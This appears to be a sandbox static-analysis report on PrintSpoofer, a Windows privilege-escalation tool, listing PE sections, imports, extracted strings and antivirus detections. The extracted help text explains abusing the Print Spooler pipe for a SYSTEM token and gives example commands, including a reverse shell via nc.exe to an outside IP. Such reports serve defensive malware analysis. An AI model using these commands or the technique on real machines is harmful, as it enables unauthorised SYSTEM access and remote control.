Static | ZeroBOX

PE Compile Time

2020-09-11 02:43:17

PE Imphash

c8bf48e03c8c37268b47f1d2591aa6fd

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00001abd 0x00001c00 6.1342057333
.rdata 0x00003000 0x00002db6 0x00002e00 4.06496359537
.data 0x00006000 0x00000398 0x00000200 0.280401167659
.rsrc 0x00007000 0x000001e0 0x00000200 4.70150325825
.reloc 0x00008000 0x000002e8 0x00000400 5.41990206757

Resources

Name Offset Size Language Sub-language File type
RT_MANIFEST 0x00007060 0x0000017d LANG_ENGLISH SUBLANG_ENGLISH_US XML 1.0 document text

Imports

Library KERNEL32.dll:
0x403038 ConnectNamedPipe
0x40303c GetComputerNameW
0x403040 CreateThread
0x403044 CloseHandle
0x403048 GetCurrentThread
0x40304c GetLastError
0x403050 CreateEventW
0x403054 GetSystemDirectoryW
0x403058 WaitForSingleObject
0x40305c CreateNamedPipeW
0x403060 GetCurrentProcess
0x403064 IsDebuggerPresent
0x403068 InitializeSListHead
0x403070 GetCurrentThreadId
0x403074 GetCurrentProcessId
0x403080 TerminateProcess
0x40308c GetModuleHandleW
Library ADVAPI32.dll:
0x403000 OpenThreadToken
0x403008 RevertToSelf
0x40300c SetTokenInformation
0x403018 OpenProcessToken
0x40302c DuplicateTokenEx
0x403030 GetTokenInformation
Library RPCRT4.dll:
0x403094 UuidCreate
0x403098 RpcBindingFree
0x40309c RpcStringFreeW
0x4030a4 UuidToStringW
0x4030ac NdrClientCall2
Library USERENV.dll:
Library VCRUNTIME140.dll:
0x4030c0 memset
0x4030c8 __current_exception
Library api-ms-win-crt-stdio-l1-1-0.dll:
0x403150 __p__commode
0x403154 _set_fmode
0x403158 __acrt_iob_func
0x403160 fflush
Library api-ms-win-crt-string-l1-1-0.dll:
0x403168 _wcsicmp
Library api-ms-win-crt-convert-l1-1-0.dll:
0x4030d4 wcstoul
Library api-ms-win-crt-heap-l1-1-0.dll:
0x4030dc malloc
0x4030e0 _set_new_mode
0x4030e4 free
Library api-ms-win-crt-runtime-l1-1-0.dll:
0x4030fc _c_exit
0x403104 __p___argc
0x403108 _initterm_e
0x40310c _set_app_type
0x403110 _cexit
0x403114 _seh_filter_exe
0x40311c _crt_atexit
0x403120 _controlfp_s
0x403124 terminate
0x40312c _initterm
0x403130 _exit
0x403138 __p___wargv
0x403144 exit
Library api-ms-win-crt-math-l1-1-0.dll:
0x4030f4 __setusermatherr
Library api-ms-win-crt-locale-l1-1-0.dll:
0x4030ec _configthreadlocale

!This program cannot be run in DOS mode.
6Richt
`.rdata
@.data
@.reloc
t$Lh H@
SVWjD3
M9=xc@
u"h@c@
ncacn_np
\pipe\spoolss
.text$mn
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIZ
.CRT$XPA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
GetCurrentProcess
CreateNamedPipeW
WaitForSingleObject
GetSystemDirectoryW
CreateEventW
GetLastError
GetCurrentThread
CloseHandle
CreateThread
GetComputerNameW
ConnectNamedPipe
KERNEL32.dll
GetTokenInformation
OpenThreadToken
DuplicateTokenEx
ConvertStringSecurityDescriptorToSecurityDescriptorW
CreateProcessAsUserW
InitializeSecurityDescriptor
ImpersonateNamedPipeClient
OpenProcessToken
CreateProcessWithTokenW
LookupPrivilegeNameW
SetTokenInformation
RevertToSelf
AdjustTokenPrivileges
ADVAPI32.dll
NdrClientCall2
UuidToStringW
RpcBindingFromStringBindingW
RpcStringBindingComposeW
RpcStringFreeW
RpcBindingFree
UuidCreate
RPCRT4.dll
DestroyEnvironmentBlock
CreateEnvironmentBlock
USERENV.dll
_except_handler4_common
__current_exception
__current_exception_context
memset
VCRUNTIME140.dll
__acrt_iob_func
_wcsicmp
fflush
__stdio_common_vfwprintf
wcstoul
__stdio_common_vswprintf
malloc
_seh_filter_exe
_set_app_type
__setusermatherr
_configure_wide_argv
_initialize_wide_environment
_get_initial_wide_environment
_initterm
_initterm_e
_set_fmode
__p___argc
__p___wargv
_cexit
_c_exit
_register_thread_local_exe_atexit_callback
_configthreadlocale
_set_new_mode
__p__commode
_initialize_onexit_table
_register_onexit_function
_crt_atexit
_controlfp_s
terminate
api-ms-win-crt-stdio-l1-1-0.dll
api-ms-win-crt-string-l1-1-0.dll
api-ms-win-crt-convert-l1-1-0.dll
api-ms-win-crt-heap-l1-1-0.dll
api-ms-win-crt-runtime-l1-1-0.dll
api-ms-win-crt-math-l1-1-0.dll
api-ms-win-crt-locale-l1-1-0.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
TerminateProcess
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
GetModuleHandleW
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
0E0K0Q0
22)232Z2j2~2
313<3D3d3h3l3p3t3x3|3
5 5I5V5\5w5
6%6.6H6
9%989S9i9}9
;$;.;4;D;\;q;{;
<0<7<F<o<}<
="=0=G=Z=`=e=k=}=
>%>O>T>
>+?V?k?p?u?
1"1)10171>1E1M1U1]1i1r1w1}1
3#3*303B3L3
3:4I4R4_4u4
4#5,525
606:6Z6
72777J7a7~7
8.979@9N9W9y9
:#:):/:5:;:A:K:
2 2$2,2828;<;
\0`0h0T3X3t3x3
[-] Invalid session id: %ws
[-] Missing value for option: -d
[-] Missing value for option: -c
[-] Invalid argument: %ls
[-] More than one interaction mode was specified.
[-] Please specify a command to execute
PrintSpoofer v%ws (by @itm4n)
Provided that the current user has the SeImpersonate privilege, this tool will leverage the Print
Spooler service to get a SYSTEM token and then run a custom command with CreateProcessAsUser()
Arguments:
-c <CMD> Execute the command *CMD*
-i Interact with the new process in the current command prompt (default is non-interactive)
-d <ID> Spawn a new process on the desktop corresponding to this session *ID* (check your ID with qwinsta)
-h That's me :)
Examples:
- Run PowerShell as SYSTEM in the current console
PrintSpoofer.exe -i -c powershell.exe
- Spawn a SYSTEM command prompt on the desktop of the session 1
PrintSpoofer.exe -d 1 -c cmd.exe
- Get a SYSTEM reverse shell
PrintSpoofer.exe -c "c:\Temp\nc.exe 10.10.13.37 1337 -e cmd"
SeImpersonatePrivilege
[-] A privilege is missing: '%ws'
[+] Found privilege: %ws
[-] Failed to generate a name for the pipe.
[-] Failed to create a named pipe.
[-] Failed to connect the named pipe.
[+] Named pipe listening...
[-] Failed to trigger the Spooler service.
[-] Operation failed or timed out.
OpenProcessToken() failed. Error: %d
GetTokenInformation() failed. Error: %d
LookupPrivilegeName() failed. Error: %d
AdjustTokenPrivileges() failed. Error: %d
\\.\pipe\%ws\pipe\spoolss
InitializeSecurityDescriptor() failed. Error: %d
D:(A;OICI;GA;;;WD)
ConvertStringSecurityDescriptorToSecurityDescriptor() failed. Error: %d
CreateNamedPipe() failed. Error: %d
CreateEvent() failed. Error: %d
ConnectNamedPipe() failed. Error: %d
CreateThread() failed. Error: %d
\\%ws/pipe/%ws
ImpersonateNamedPipeClient(). Error: %d
OpenThreadToken(). Error: %d
DuplicateTokenEx() failed. Error: %d
SetTokenInformation() failed. Error: %d
GetSystemDirectory() failed. Error: %d
CreateEnvironmentBlock() failed. Error: %d
WinSta0\Default
[!] CreateProcessAsUser() failed because of a missing privilege, retrying with CreateProcessWithTokenW().
CreateProcessWithTokenW() failed. Error: %d
[+] CreateProcessWithTokenW() OK
[!] CreateProcessWithTokenW() isn't compatible with option -i
CreateProcessAsUser() failed. Error: %d
[+] CreateProcessAsUser() OK
\pipe\spoolss
ncacn_np
12345678-1234-ABCD-EF00-0123456789AB
Antivirus Signature
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.PrintSpoofer.3!c
tehtris Clean
ClamAV Win.Malware.Printspoofer-9835534-0
CMC Clean
CAT-QuickHeal Clean
Skyhigh BehavesLike.Win32.Dropper.mm
ALYac Generic.PrintSpoofer.1.36D0EC94
Cylance Unsafe
Zillya Tool.Agent.Win32.43329
Sangfor Hacktool.Win32.Printspoofer.Vjqs
K7AntiVirus Hacktool ( 00568d8b1 )
Alibaba Exploit:Win32/Printer.b02419b6
K7GW Hacktool ( 00568d8b1 )
Cybereason malicious.7b5002
huorong HackTool/EoP.a
Baidu Clean
VirIT Clean
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
Elastic Windows.Exploit.FakePipe
ESET-NOD32 a variant of Win32/HackTool.Agent.NFL
APEX Clean
Avast Win32:ExploitX-gen [Expl]
Cynet Malicious (score: 99)
Kaspersky HEUR:Exploit.Multi.Printer.gen
BitDefender Generic.PrintSpoofer.1.36D0EC94
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Generic.PrintSpoofer.1.36D0EC94
Tencent Malware.Win32.Gencirc.115db5f5
TACHYON Clean
Sophos Mal/Generic-S
F-Secure Trojan.TR/Hacktool.njyhi
DrWeb Tool.PrintSpoofer.3
VIPRE Generic.PrintSpoofer.1.36D0EC94
TrendMicro TROJ_GEN.R002C0GL523
McAfeeD ti!47C9EFF81424
Trapmine Clean
FireEye Generic.mg.2a74db17b50025d1
Emsisoft Generic.PrintSpoofer.1.36D0EC94 (B)
Ikarus Trojan.Win32.HackTool
GData Generic.PrintSpoofer.1.36D0EC94
Jiangmin Exploit.Printer.a
Webroot W32.Malware.Gen
Varist W32/ABTrojan.RRGN-8635
Avira TR/Hacktool.njyhi
Antiy-AVL HackTool/Win32.Agent
Kingsoft Clean
Gridinsoft Clean
Xcitium Malware@#2aytu59dcgnz
Arcabit Generic.PrintSpoofer.1.36D0EC94
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Exploit.Multi.Printer.gen
Microsoft Trojan:Win32/Skeeyah
Google Detected
AhnLab-V3 Exploit/Win.PrintSpoofer.R358767
Acronis Clean
McAfee GenericRXAA-AA!2A74DB17B500
MAX malware (ai score=81)
VBA32 Clean
Malwarebytes Generic.Trojan.HackTool.DDS
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R002C0GL523
Rising HackTool.Agent!8.335 (TFE:5:dPySkdZtye)
Yandex Riskware.Agent!LoXxUTKSAHg
SentinelOne Static AI - Suspicious PE
MaxSecure Trojan.Malware.118857602.susgen
Fortinet W32/Agent.NFL!tr
BitDefenderTheta Clean
AVG Win32:ExploitX-gen [Expl]
DeepInstinct MALICIOUS
CrowdStrike win/grayware_confidence_100% (W)
alibabacloud HackTool:Win/Agent.BG
No IRMA results available.